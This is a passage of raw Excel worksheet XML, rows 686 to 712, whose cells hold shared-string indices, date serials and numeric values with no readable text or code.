      <c r="P686" t="s">
        <v>93</v>
      </c>
      <c r="Q686" s="95" t="s">
        <v>2319</v>
      </c>
      <c r="W686" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="687" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A687" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B687" s="52">
        <v>44130.664220289349</v>
      </c>
      <c r="C687" s="95" t="s">
        <v>2320</v>
      </c>
      <c r="D687" s="96">
        <v>100</v>
      </c>
      <c r="E687" s="95" t="s">
        <v>2321</v>
      </c>
      <c r="F687" s="42">
        <v>100</v>
      </c>
      <c r="G687" s="95" t="s">
        <v>2322</v>
      </c>
      <c r="H687" t="s">
        <v>2323</v>
      </c>
      <c r="I687" t="s">
        <v>103</v>
      </c>
      <c r="J687" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K687" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L687" t="s">
        <v>77</v>
      </c>
      <c r="M687" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O687" s="95" t="s">
        <v>2324</v>
      </c>
      <c r="Q687" s="95" t="s">
        <v>142</v>
      </c>
      <c r="W687" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="688" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A688" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B688" s="52">
        <v>44649.645903877317</v>
      </c>
      <c r="C688" s="95" t="s">
        <v>2320</v>
      </c>
      <c r="D688" s="96">
        <v>110</v>
      </c>
      <c r="E688" s="95" t="s">
        <v>2325</v>
      </c>
      <c r="F688" s="42">
        <v>100</v>
      </c>
      <c r="G688" s="95" t="s">
        <v>2326</v>
      </c>
      <c r="H688" t="s">
        <v>2327</v>
      </c>
      <c r="I688" t="s">
        <v>179</v>
      </c>
      <c r="J688" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K688" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L688" t="s">
        <v>77</v>
      </c>
      <c r="M688" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="Q688" s="95" t="s">
        <v>2328</v>
      </c>
      <c r="T688">
        <v>23</v>
      </c>
      <c r="U688">
        <v>9</v>
      </c>
      <c r="W688" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="689" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A689" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B689" s="52">
        <v>44474.592447743053</v>
      </c>
      <c r="C689" s="95" t="s">
        <v>2320</v>
      </c>
      <c r="D689" s="96">
        <v>110</v>
      </c>
      <c r="E689" s="95" t="s">
        <v>2329</v>
      </c>
      <c r="F689" s="42">
        <v>101</v>
      </c>
      <c r="G689" s="95" t="s">
        <v>2330</v>
      </c>
      <c r="H689" t="s">
        <v>2331</v>
      </c>
      <c r="I689" t="s">
        <v>179</v>
      </c>
      <c r="J689" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K689" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L689" t="s">
        <v>77</v>
      </c>
      <c r="M689" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="Q689" s="95" t="s">
        <v>2328</v>
      </c>
      <c r="W689" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="690" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A690" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B690" s="52">
        <v>44588.71479027778</v>
      </c>
      <c r="C690" s="95" t="s">
        <v>2332</v>
      </c>
      <c r="D690" s="96">
        <v>201</v>
      </c>
      <c r="E690" s="95" t="s">
        <v>2333</v>
      </c>
      <c r="F690" s="42">
        <v>101</v>
      </c>
      <c r="G690" s="95" t="s">
        <v>2334</v>
      </c>
      <c r="H690" t="s">
        <v>2335</v>
      </c>
      <c r="I690" t="s">
        <v>31</v>
      </c>
      <c r="J690" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K690" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L690" t="s">
        <v>77</v>
      </c>
      <c r="M690" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N690" t="s">
        <v>263</v>
      </c>
      <c r="Q690" s="95" t="s">
        <v>2336</v>
      </c>
      <c r="R690">
        <v>408</v>
      </c>
      <c r="S690">
        <v>606</v>
      </c>
      <c r="T690">
        <v>767</v>
      </c>
      <c r="U690">
        <v>3512</v>
      </c>
      <c r="V690">
        <v>125382</v>
      </c>
      <c r="W690" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="691" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A691" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B691" s="52">
        <v>44567.597528530096</v>
      </c>
      <c r="C691" s="95" t="s">
        <v>2332</v>
      </c>
      <c r="D691" s="96">
        <v>100</v>
      </c>
      <c r="E691" s="95" t="s">
        <v>2337</v>
      </c>
      <c r="F691" s="42">
        <v>100</v>
      </c>
      <c r="G691" s="95" t="s">
        <v>2338</v>
      </c>
      <c r="H691" t="s">
        <v>2339</v>
      </c>
      <c r="I691" t="s">
        <v>31</v>
      </c>
      <c r="J691" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K691" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L691" t="s">
        <v>77</v>
      </c>
      <c r="M691" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N691" t="s">
        <v>263</v>
      </c>
      <c r="Q691" s="95" t="s">
        <v>2340</v>
      </c>
      <c r="R691">
        <v>310707</v>
      </c>
      <c r="S691">
        <v>641937</v>
      </c>
      <c r="T691">
        <v>166967</v>
      </c>
      <c r="U691">
        <v>388546</v>
      </c>
      <c r="V691">
        <v>259734</v>
      </c>
      <c r="W691" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="692" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A692" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B692" s="52">
        <v>44055.653204247683</v>
      </c>
      <c r="C692" s="95" t="s">
        <v>2332</v>
      </c>
      <c r="D692" s="96">
        <v>201</v>
      </c>
      <c r="E692" s="95" t="s">
        <v>2337</v>
      </c>
      <c r="F692" s="42">
        <v>200</v>
      </c>
      <c r="G692" s="95" t="s">
        <v>2338</v>
      </c>
      <c r="H692" t="s">
        <v>2341</v>
      </c>
      <c r="I692" t="s">
        <v>31</v>
      </c>
      <c r="J692" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K692" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L692" t="s">
        <v>77</v>
      </c>
      <c r="M692" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N692" t="s">
        <v>263</v>
      </c>
      <c r="Q692" s="95" t="s">
        <v>2336</v>
      </c>
      <c r="R692">
        <v>310707</v>
      </c>
      <c r="S692">
        <v>641937</v>
      </c>
      <c r="T692">
        <v>166967</v>
      </c>
      <c r="U692">
        <v>388546</v>
      </c>
      <c r="V692">
        <v>259734</v>
      </c>
      <c r="W692" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="693" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A693" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B693" s="52">
        <v>44588.714790358797</v>
      </c>
      <c r="C693" s="95" t="s">
        <v>2332</v>
      </c>
      <c r="D693" s="96">
        <v>100</v>
      </c>
      <c r="E693" s="95" t="s">
        <v>2342</v>
      </c>
      <c r="F693" s="42">
        <v>100</v>
      </c>
      <c r="G693" s="95" t="s">
        <v>2343</v>
      </c>
      <c r="H693" t="s">
        <v>2344</v>
      </c>
      <c r="I693" t="s">
        <v>31</v>
      </c>
      <c r="J693" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K693" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L693" t="s">
        <v>77</v>
      </c>
      <c r="M693" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N693" t="s">
        <v>263</v>
      </c>
      <c r="O693" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q693" s="95" t="s">
        <v>2340</v>
      </c>
      <c r="R693">
        <v>693129</v>
      </c>
      <c r="S693">
        <v>577177</v>
      </c>
      <c r="T693">
        <v>472980</v>
      </c>
      <c r="U693">
        <v>551060</v>
      </c>
      <c r="V693">
        <v>743811</v>
      </c>
      <c r="W693" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="694" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A694" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B694" s="52">
        <v>44055.653204212962</v>
      </c>
      <c r="C694" s="95" t="s">
        <v>2332</v>
      </c>
      <c r="D694" s="96">
        <v>201</v>
      </c>
      <c r="E694" s="95" t="s">
        <v>2345</v>
      </c>
      <c r="F694" s="42">
        <v>110</v>
      </c>
      <c r="G694" s="95" t="s">
        <v>2343</v>
      </c>
      <c r="H694" t="s">
        <v>2344</v>
      </c>
      <c r="I694" t="s">
        <v>31</v>
      </c>
      <c r="J694" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K694" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L694" t="s">
        <v>77</v>
      </c>
      <c r="M694" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N694" t="s">
        <v>263</v>
      </c>
      <c r="O694" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q694" s="95" t="s">
        <v>2336</v>
      </c>
      <c r="R694">
        <v>693129</v>
      </c>
      <c r="S694">
        <v>577177</v>
      </c>
      <c r="T694">
        <v>472980</v>
      </c>
      <c r="U694">
        <v>551060</v>
      </c>
      <c r="V694">
        <v>743811</v>
      </c>
      <c r="W694" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="695" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A695" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B695" s="52">
        <v>44525.495957129628</v>
      </c>
      <c r="C695" s="95" t="s">
        <v>1646</v>
      </c>
      <c r="D695" s="96">
        <v>100</v>
      </c>
      <c r="E695" s="95" t="s">
        <v>2346</v>
      </c>
      <c r="F695" s="42">
        <v>100</v>
      </c>
      <c r="G695" s="95" t="s">
        <v>2347</v>
      </c>
      <c r="H695" t="s">
        <v>2348</v>
      </c>
      <c r="I695" t="s">
        <v>31</v>
      </c>
      <c r="J695" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K695" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L695" t="s">
        <v>77</v>
      </c>
      <c r="M695" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N695" t="s">
        <v>263</v>
      </c>
      <c r="Q695" s="95" t="s">
        <v>1650</v>
      </c>
      <c r="R695">
        <v>205</v>
      </c>
      <c r="S695">
        <v>684</v>
      </c>
      <c r="T695">
        <v>597</v>
      </c>
      <c r="U695">
        <v>1285</v>
      </c>
      <c r="V695">
        <v>2107</v>
      </c>
      <c r="W695" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="696" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A696" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B696" s="52">
        <v>44616.803946759261</v>
      </c>
      <c r="C696" s="95" t="s">
        <v>2349</v>
      </c>
      <c r="D696" s="96">
        <v>100</v>
      </c>
      <c r="E696" s="95" t="s">
        <v>2350</v>
      </c>
      <c r="F696" s="42">
        <v>100</v>
      </c>
      <c r="G696" s="95" t="s">
        <v>2351</v>
      </c>
      <c r="H696" t="s">
        <v>2352</v>
      </c>
      <c r="I696" t="s">
        <v>179</v>
      </c>
      <c r="J696" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K696" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L696" t="s">
        <v>77</v>
      </c>
      <c r="M696" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O696" s="95" t="s">
        <v>2353</v>
      </c>
      <c r="Q696" s="95" t="s">
        <v>2354</v>
      </c>
      <c r="R696">
        <v>2</v>
      </c>
      <c r="S696">
        <v>29</v>
      </c>
      <c r="U696">
        <v>23</v>
      </c>
      <c r="W696" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="697" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A697" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B697" s="52">
        <v>44223.845142511571</v>
      </c>
      <c r="C697" s="95" t="s">
        <v>2355</v>
      </c>
      <c r="D697" s="96">
        <v>223</v>
      </c>
      <c r="E697" s="95" t="s">
        <v>2356</v>
      </c>
      <c r="F697" s="42">
        <v>102</v>
      </c>
      <c r="G697" s="95" t="s">
        <v>2357</v>
      </c>
      <c r="H697" t="s">
        <v>2358</v>
      </c>
      <c r="I697" t="s">
        <v>179</v>
      </c>
      <c r="J697" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K697" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L697" t="s">
        <v>77</v>
      </c>
      <c r="M697" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O697" s="95" t="s">
        <v>2359</v>
      </c>
      <c r="Q697" s="95" t="s">
        <v>2360</v>
      </c>
      <c r="W697" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="698" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A698" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B698" s="52">
        <v>44322.944375798608</v>
      </c>
      <c r="C698" s="95" t="s">
        <v>2355</v>
      </c>
      <c r="D698" s="96">
        <v>223</v>
      </c>
      <c r="E698" s="95" t="s">
        <v>2361</v>
      </c>
      <c r="F698" s="42">
        <v>222</v>
      </c>
      <c r="G698" s="95" t="s">
        <v>2362</v>
      </c>
      <c r="H698" t="s">
        <v>2363</v>
      </c>
      <c r="I698" t="s">
        <v>179</v>
      </c>
      <c r="J698" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K698" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L698" t="s">
        <v>77</v>
      </c>
      <c r="M698" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O698" s="95" t="s">
        <v>2364</v>
      </c>
      <c r="P698" t="s">
        <v>920</v>
      </c>
      <c r="Q698" s="95" t="s">
        <v>2360</v>
      </c>
      <c r="R698">
        <v>1695225</v>
      </c>
      <c r="S698">
        <v>1455563</v>
      </c>
      <c r="T698">
        <v>1467864</v>
      </c>
      <c r="U698">
        <v>1312363</v>
      </c>
      <c r="V698">
        <v>1617573</v>
      </c>
      <c r="W698" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="699" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A699" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B699" s="52">
        <v>43977.482397523148</v>
      </c>
      <c r="C699" s="95" t="s">
        <v>2355</v>
      </c>
      <c r="D699" s="96">
        <v>223</v>
      </c>
      <c r="E699" s="95" t="s">
        <v>2365</v>
      </c>
      <c r="F699" s="42">
        <v>100</v>
      </c>
      <c r="G699" s="95" t="s">
        <v>2366</v>
      </c>
      <c r="H699" t="s">
        <v>1071</v>
      </c>
      <c r="I699" t="s">
        <v>179</v>
      </c>
      <c r="J699" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K699" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L699" t="s">
        <v>77</v>
      </c>
      <c r="M699" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O699" s="95" t="s">
        <v>2367</v>
      </c>
      <c r="Q699" s="95" t="s">
        <v>2360</v>
      </c>
      <c r="W699" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="700" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A700" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B700" s="52">
        <v>44223.845142442129</v>
      </c>
      <c r="C700" s="95" t="s">
        <v>2355</v>
      </c>
      <c r="D700" s="96">
        <v>223</v>
      </c>
      <c r="E700" s="95" t="s">
        <v>2368</v>
      </c>
      <c r="F700" s="42">
        <v>111</v>
      </c>
      <c r="G700" s="95" t="s">
        <v>2369</v>
      </c>
      <c r="H700" t="s">
        <v>1074</v>
      </c>
      <c r="I700" t="s">
        <v>179</v>
      </c>
      <c r="J700" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K700" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L700" t="s">
        <v>77</v>
      </c>
      <c r="M700" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O700" s="95" t="s">
        <v>2370</v>
      </c>
      <c r="P700" t="s">
        <v>181</v>
      </c>
      <c r="Q700" s="95" t="s">
        <v>2360</v>
      </c>
      <c r="S700">
        <v>17</v>
      </c>
      <c r="T700">
        <v>1</v>
      </c>
      <c r="U700">
        <v>33</v>
      </c>
      <c r="V700">
        <v>2</v>
      </c>
      <c r="W700" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="701" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A701" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B701" s="52">
        <v>44322.94437582176</v>
      </c>
      <c r="C701" s="95" t="s">
        <v>2355</v>
      </c>
      <c r="D701" s="96">
        <v>223</v>
      </c>
      <c r="E701" s="95" t="s">
        <v>2371</v>
      </c>
      <c r="F701" s="42">
        <v>112</v>
      </c>
      <c r="G701" s="95" t="s">
        <v>2372</v>
      </c>
      <c r="H701" t="s">
        <v>2373</v>
      </c>
      <c r="I701" t="s">
        <v>179</v>
      </c>
      <c r="J701" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K701" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L701" t="s">
        <v>77</v>
      </c>
      <c r="M701" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O701" s="95" t="s">
        <v>2374</v>
      </c>
      <c r="Q701" s="95" t="s">
        <v>2360</v>
      </c>
      <c r="W701" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="702" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A702" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B702" s="52">
        <v>44433.736928321756</v>
      </c>
      <c r="C702" s="95" t="s">
        <v>1599</v>
      </c>
      <c r="D702" s="96">
        <v>111</v>
      </c>
      <c r="E702" s="95" t="s">
        <v>2375</v>
      </c>
      <c r="F702" s="42">
        <v>101</v>
      </c>
      <c r="G702" s="95" t="s">
        <v>2376</v>
      </c>
      <c r="H702" t="s">
        <v>2377</v>
      </c>
      <c r="I702" t="s">
        <v>31</v>
      </c>
      <c r="J702" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K702" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L702" t="s">
        <v>77</v>
      </c>
      <c r="M702" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N702" t="s">
        <v>263</v>
      </c>
      <c r="Q702" s="95" t="s">
        <v>1603</v>
      </c>
      <c r="R702">
        <v>175315</v>
      </c>
      <c r="S702">
        <v>264901</v>
      </c>
      <c r="T702">
        <v>292700</v>
      </c>
      <c r="U702">
        <v>308208</v>
      </c>
      <c r="V702">
        <v>396773</v>
      </c>
      <c r="W702" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="703" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A703" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B703" s="52">
        <v>44519.632626620369</v>
      </c>
      <c r="C703" s="95" t="s">
        <v>1599</v>
      </c>
      <c r="D703" s="96">
        <v>201</v>
      </c>
      <c r="E703" s="95" t="s">
        <v>2375</v>
      </c>
      <c r="F703" s="42">
        <v>200</v>
      </c>
      <c r="G703" s="95" t="s">
        <v>2376</v>
      </c>
      <c r="H703" t="s">
        <v>2377</v>
      </c>
      <c r="I703" t="s">
        <v>31</v>
      </c>
      <c r="J703" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K703" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L703" t="s">
        <v>77</v>
      </c>
      <c r="M703" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N703" t="s">
        <v>263</v>
      </c>
      <c r="Q703" s="95" t="s">
        <v>1604</v>
      </c>
      <c r="R703">
        <v>175315</v>
      </c>
      <c r="S703">
        <v>264901</v>
      </c>
      <c r="T703">
        <v>292700</v>
      </c>
      <c r="U703">
        <v>308208</v>
      </c>
      <c r="V703">
        <v>396773</v>
      </c>
      <c r="W703" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="704" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A704" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B704" s="52">
        <v>44670.815063148148</v>
      </c>
      <c r="C704" s="95" t="s">
        <v>2378</v>
      </c>
      <c r="D704" s="96">
        <v>101</v>
      </c>
      <c r="E704" s="95" t="s">
        <v>2379</v>
      </c>
      <c r="F704" s="42">
        <v>101</v>
      </c>
      <c r="G704" s="95" t="s">
        <v>2380</v>
      </c>
      <c r="H704" t="s">
        <v>2381</v>
      </c>
      <c r="I704" t="s">
        <v>31</v>
      </c>
      <c r="J704" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K704" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L704" t="s">
        <v>77</v>
      </c>
      <c r="M704" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N704" t="s">
        <v>263</v>
      </c>
      <c r="Q704" s="95" t="s">
        <v>2382</v>
      </c>
      <c r="R704">
        <v>40741</v>
      </c>
      <c r="S704">
        <v>30502</v>
      </c>
      <c r="T704">
        <v>34254</v>
      </c>
      <c r="U704">
        <v>68134</v>
      </c>
      <c r="V704">
        <v>112684</v>
      </c>
      <c r="W704" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="705" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A705" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B705" s="52">
        <v>44223.845142488426</v>
      </c>
      <c r="C705" s="95" t="s">
        <v>2355</v>
      </c>
      <c r="D705" s="96">
        <v>223</v>
      </c>
      <c r="E705" s="95" t="s">
        <v>2383</v>
      </c>
      <c r="F705" s="42">
        <v>105</v>
      </c>
      <c r="G705" s="95" t="s">
        <v>2384</v>
      </c>
      <c r="H705" t="s">
        <v>2385</v>
      </c>
      <c r="I705" t="s">
        <v>179</v>
      </c>
      <c r="J705" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K705" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L705" t="s">
        <v>77</v>
      </c>
      <c r="M705" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="O705" s="95" t="s">
        <v>2370</v>
      </c>
      <c r="P705" t="s">
        <v>181</v>
      </c>
      <c r="Q705" s="95" t="s">
        <v>2360</v>
      </c>
      <c r="R705">
        <v>919</v>
      </c>
      <c r="S705">
        <v>286</v>
      </c>
      <c r="T705">
        <v>793</v>
      </c>
      <c r="U705">
        <v>9721</v>
      </c>
      <c r="V705">
        <v>48911</v>
      </c>
      <c r="W705" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="706" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A706" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B706" s="52">
        <v>44033.617680532407</v>
      </c>
      <c r="C706" s="95" t="s">
        <v>1489</v>
      </c>
      <c r="D706" s="96">
        <v>110</v>
      </c>
      <c r="E706" s="95" t="s">
        <v>2386</v>
      </c>
      <c r="F706" s="42">
        <v>100</v>
      </c>
      <c r="G706" s="95" t="s">
        <v>2387</v>
      </c>
      <c r="H706" t="s">
        <v>2388</v>
      </c>
      <c r="I706" t="s">
        <v>31</v>
      </c>
      <c r="J706" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K706" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L706" t="s">
        <v>77</v>
      </c>
      <c r="M706" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N706" t="s">
        <v>263</v>
      </c>
      <c r="Q706" s="95" t="s">
        <v>1493</v>
      </c>
      <c r="W706" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="707" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A707" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B707" s="52"/>
      <c r="C707" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D707" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E707" s="95" t="s">
        <v>2389</v>
      </c>
      <c r="F707" s="42">
        <v>100</v>
      </c>
      <c r="G707" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H707" t="s">
        <v>2390</v>
      </c>
      <c r="I707" t="s">
        <v>179</v>
      </c>
      <c r="J707" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K707" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L707" t="s">
        <v>77</v>
      </c>
      <c r="Q707" s="95" t="s">
        <v>2391</v>
      </c>
      <c r="W707" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="708" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A708" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B708" s="52">
        <v>43971.46526986111</v>
      </c>
      <c r="C708" s="95" t="s">
        <v>1733</v>
      </c>
      <c r="D708" s="96">
        <v>101</v>
      </c>
      <c r="E708" s="95" t="s">
        <v>2392</v>
      </c>
      <c r="F708" s="42">
        <v>101</v>
      </c>
      <c r="G708" s="95" t="s">
        <v>2393</v>
      </c>
      <c r="H708" t="s">
        <v>2394</v>
      </c>
      <c r="I708" t="s">
        <v>31</v>
      </c>
      <c r="J708" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K708" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L708" t="s">
        <v>77</v>
      </c>
      <c r="M708" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N708" t="s">
        <v>263</v>
      </c>
      <c r="Q708" s="95" t="s">
        <v>1737</v>
      </c>
      <c r="W708" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="709" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A709" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B709" s="52">
        <v>44292.098849618058</v>
      </c>
      <c r="C709" s="95" t="s">
        <v>1733</v>
      </c>
      <c r="D709" s="96">
        <v>105</v>
      </c>
      <c r="E709" s="95" t="s">
        <v>2392</v>
      </c>
      <c r="F709" s="42">
        <v>105</v>
      </c>
      <c r="G709" s="95" t="s">
        <v>2393</v>
      </c>
      <c r="H709" t="s">
        <v>2395</v>
      </c>
      <c r="I709" t="s">
        <v>31</v>
      </c>
      <c r="J709" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K709" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L709" t="s">
        <v>77</v>
      </c>
      <c r="M709" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N709" t="s">
        <v>263</v>
      </c>
      <c r="Q709" s="95" t="s">
        <v>1738</v>
      </c>
      <c r="R709">
        <v>2561</v>
      </c>
      <c r="S709">
        <v>2807</v>
      </c>
      <c r="T709">
        <v>2490</v>
      </c>
      <c r="U709">
        <v>2504</v>
      </c>
      <c r="V709">
        <v>2944</v>
      </c>
      <c r="W709" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="710" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A710" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B710" s="52">
        <v>44266.705436481483</v>
      </c>
      <c r="C710" s="95" t="s">
        <v>2396</v>
      </c>
      <c r="D710" s="96">
        <v>133</v>
      </c>
      <c r="E710" s="95" t="s">
        <v>2397</v>
      </c>
      <c r="F710" s="42">
        <v>113</v>
      </c>
      <c r="G710" s="95" t="s">
        <v>2398</v>
      </c>
      <c r="H710" t="s">
        <v>2399</v>
      </c>
      <c r="I710" t="s">
        <v>17</v>
      </c>
      <c r="J710" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K710" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L710" t="s">
        <v>83</v>
      </c>
      <c r="M710" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q710" s="95" t="s">
        <v>2400</v>
      </c>
      <c r="R710">
        <v>390710</v>
      </c>
      <c r="S710">
        <v>399448</v>
      </c>
      <c r="T710">
        <v>330422</v>
      </c>
      <c r="U710">
        <v>413011</v>
      </c>
      <c r="V710">
        <v>370392</v>
      </c>
      <c r="W710" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="711" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A711" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B711" s="52">
        <v>44266.705436516204</v>
      </c>
      <c r="C711" s="95" t="s">
        <v>2396</v>
      </c>
      <c r="D711" s="96">
        <v>133</v>
      </c>
      <c r="E711" s="95" t="s">
        <v>2401</v>
      </c>
      <c r="F711" s="42">
        <v>110</v>
      </c>
      <c r="G711" s="95" t="s">
        <v>2402</v>
      </c>
      <c r="H711" t="s">
        <v>2403</v>
      </c>
      <c r="I711" t="s">
        <v>17</v>
      </c>
      <c r="J711" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K711" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L711" t="s">
        <v>83</v>
      </c>
      <c r="M711" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O711" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q711" s="95" t="s">
        <v>2400</v>
      </c>
      <c r="R711">
        <v>164</v>
      </c>
      <c r="S711">
        <v>215</v>
      </c>
      <c r="T711">
        <v>120</v>
      </c>
      <c r="U711">
        <v>172</v>
      </c>
      <c r="V711">
        <v>195</v>
      </c>
      <c r="W711" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="712" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A712" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B712" s="52">
        <v>44266.705436493059</v>
      </c>
      <c r="C712" s="95" t="s">
        <v>2396</v>
      </c>
      <c r="D712" s="96">
        <v>133</v>
      </c>
      <c r="E712" s="95" t="s">
        <v>2404</v>
      </c>
      <c r="F712" s="42">
        <v>110</v>
      </c>
